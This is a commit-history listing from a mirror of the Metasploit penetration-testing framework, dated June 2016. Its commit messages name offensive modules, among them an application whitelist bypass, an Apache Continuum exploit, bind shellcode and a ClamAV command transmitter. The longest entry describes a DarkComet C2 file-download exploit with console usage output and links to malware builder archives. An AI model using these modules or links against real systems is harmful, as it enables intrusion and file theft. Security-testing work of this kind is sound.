adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
41,886 Commits 27 Branches 1,043 Tags
f8a94de6710abe3042a26a9dca38dcccff2c93be
Commit Graph

21851 Commits

Author SHA1 Message Date
Brendan Watters 74103f3760 Cleaned up ruby 2016-06-15 17:56:05 -05:00
wchen-r7 c6b1955a5a Land #6729, Speed up the datastore 2016-06-15 17:55:42 -05:00
Brendan Watters 312175eed3 Add ClamAV Remote Command Transmitter 2016-06-15 17:34:08 -05:00
Meatballs 0451d4f079 Cleanup 2016-06-15 22:41:59 +01:00
Rob Fuller bca88d8443 Landing #6961 Regsvr32 SCT App Whitelist Bypass Server 
by @kn0

rts
 2016-06-15 15:28:02 -04:00
h00die 81fa068ef0 pulling out the get params 2016-06-15 12:27:31 -04:00
William Webb 24eba6b831 Land #6956, Check presence in local admin group 2016-06-15 10:37:17 -05:00
Vincent Yiu 8a68e86a0a Update enum_trusted_locations.rb 
Changed some colours
 2016-06-15 13:42:38 +01:00
Vincent Yiu 48714184f3 Update enum_trusted_locations.rb 
Added product it found the locations in.
 2016-06-15 13:41:19 +01:00
h00die 52db99bfae vars_post for post request 2016-06-15 07:24:41 -04:00
Trenton Ivey 90f84d9883 Better fix to the missing command output bug 2016-06-15 05:27:27 -05:00
Trenton Ivey 791ab7a615 Fixing missing command output bug 2016-06-15 05:14:50 -05:00
h00die 625d60b52a fix the other normalize_uri 2016-06-14 15:03:07 -04:00
h00die afc942c680 fix travis 2016-06-13 19:07:14 -04:00
h00die bd4dacdbc3 added Rank 2016-06-13 19:04:06 -04:00
h00die 72ed478b59 added exploit rank 2016-06-13 18:56:33 -04:00
h00die 40f7fd46f9 changes outlined by wvu-r7 2016-06-13 18:52:25 -04:00
William Webb 563b8206c5 Land #6962, Apache Continuum Exploit 2016-06-13 16:41:53 -05:00
Trenton Ivey 05c96703a8 Regsvr32 Command Delivery Server 2016-06-13 15:14:39 -05:00
Trenton Ivey 3a39d8020d Moving back to PSH option only 2016-06-13 12:44:21 -05:00
Trenton Ivey 52bbd22a81 Moving back to PSH option only 2016-06-13 12:10:48 -05:00
samvartaka 4de337e6d9 Ran rubocop on the module as per @espreto's suggestion, cleaned up several style issues 2016-06-12 17:20:57 +02:00
Vincent Yiu 1ba33ff7f8 Fixed MSFTidy 
Fixed MSFTidy stuff
 2016-06-12 13:00:44 +01:00
Vincent Yiu a2a97d0271 Update enum_trusted_locations.rb 
Fix some changes, I had emet references.
 2016-06-12 11:06:20 +01:00
Vincent Yiu 2e03c3511e Add enum_trusted_locations.rb 
Quickly enumerates trusted locations for file planting :)
 2016-06-12 10:59:57 +01:00
h00die f63273b172 email change 2016-06-11 21:05:34 -04:00
h00die bd6eecf7b0 centreon useralias first add 2016-06-11 20:57:18 -04:00
Trenton Ivey 8c7796c6d3 Module Cleanup 2016-06-11 18:12:42 -05:00
Trenton Ivey 46eff4c96d Added command option 2016-06-11 18:07:24 -05:00
William Vu ec1248d7af Convert to CmdStager 2016-06-10 20:42:01 -05:00
Trenton Ivey 6af3c4ab99 Added zero to Run method to prevent popup 2016-06-10 14:52:02 -05:00
William Vu 46239d5b0d Add Apache Continuum exploit 2016-06-09 22:35:38 -05:00
Trenton Ivey 17974d74e2 Removing space at end of line 2016-06-09 21:49:24 -05:00
Trenton Ivey 6cd1da414f Regsvr32.exe Application Whitelist Bypass Server 2016-06-09 21:15:07 -05:00
h00die d63dc5845e wvu-r7 comment fixes 2016-06-09 21:52:21 -04:00
h00die 16b4829d57 fixed socket.get issue 2016-06-09 21:36:21 -04:00
h00die 63db330a02 rubocop fixes, msftidy fixes 2016-06-09 21:03:57 -04:00
h00die 027f538300 original from EDB 2016-06-09 20:35:00 -04:00
earthquake c0093381d7 Big endian ARM Linux bind shellcode for ipv4 2016-06-10 00:06:53 +02:00
Brent Cook b0bf901b22 Land #6950, avoid printing rhost:rport twice when using Msf::Exploit::Remote::SMB::Client 2016-06-09 16:35:09 -05:00
Brent Cook 199ae04b57 fix more duplicate port/ip things 2016-06-09 16:26:41 -05:00
Brent Cook ba40d0e06f handle the lpath not being specified 2016-06-09 16:22:47 -05:00
William Vu 6da8c22171 Rename hash method to crypt 
To avoid a conflict with Object#hash in Pro.

MS-1636
 2016-06-09 15:21:40 -05:00
wchen-r7 7143095b4b Land #6947, add auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum 2016-06-09 14:21:55 -05:00
earthquake a58a3d4330 one line aligned to the others, space replaced to tab 2016-06-09 20:53:12 +02:00
earthquake 5f4153308c one line aligned to the others, space replaced to tabx 2016-06-09 20:52:20 +02:00
wchen-r7 207d92a125 Use scan to do regex capture 2016-06-09 11:07:00 -05:00
wchen-r7 1b4a6a7981 Use the UDP mixin to it can cleanup properly 2016-06-09 11:04:50 -05:00
Crypt0-M3lon 233186c833 Check presence in local admin group 
As the "is_admin?" function only checks if the current session effectively has admin rights, I offer to add a check to know if the current user is in the local admin group using the "is_in_admin_group?" function. This information is better suited to check if admin rights are obtainable using the "bypassuac" module.
 2016-06-09 17:47:09 +02:00
samvartaka ba6d00cee2 This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up 
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf) which allows
an attacker to download arbitrary files from the DarkComet C2. The vulnerability possibly affects versions
prior to 3.2 as well. The vulnerability can be exploited without knowledge of the shared secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server.

See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.

See https://mega.nz/#!wlZkSJLK!NI_Z-9UoPBQ0MDEYXLVr1wUJyVV70qVprWqSUol_53k
for the DarkComet 5.3.1 C2 server / builder

See https://mega.nz/#!AxRmkQLb!MVjwua3qrzgyXq7vUWSxISwVE7vQ8rEJbexieb8s0Ro
for the DarkComet 4.2F C2 server / builder (archive password is 'tr')

## Console output

Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).

### Version 5.3.1 (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```

### Version 4.2F (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
 2016-06-09 14:42:25 +02:00